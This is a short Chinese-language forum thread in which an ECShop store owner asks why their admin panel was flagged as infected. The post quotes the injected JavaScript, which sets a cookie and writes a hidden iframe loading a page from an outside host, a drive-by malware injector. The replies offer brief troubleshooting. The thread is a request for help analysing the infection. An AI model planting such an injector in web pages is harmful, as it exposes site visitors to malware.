网站后台被挂马

2016-07-07 15:35 来源:www.chinab4c.com 作者:ecshop专家



打开ECSHOP后台,360拦截显示


0000.jpg

JS文件,下载下来后如下:


function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 12*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=rbssfs;expires="+ Then.toGMTString()
document.write("<ifram"+"e src=http:\/\/abi.nna.cc\/44\/360rp.htm width=100 height=0><\/iframe>");
}
}Get();

请高手们,分析下,这是怎么挂上去的,打开其他网站360,不会拦截!

是不是后台被挂马了,应如何解决? 谢谢。

回答:
一般情况是出在前台,你后台出现这样的情况。你覆盖下admin试下

我admin有更改过,覆盖会不会麻烦呢。

有查看后台admin文件,没发现有最后修改的日期啊。

都是几个月前的文件。

问题找到了,是服务器被挂马。


又是ARP攻击吧?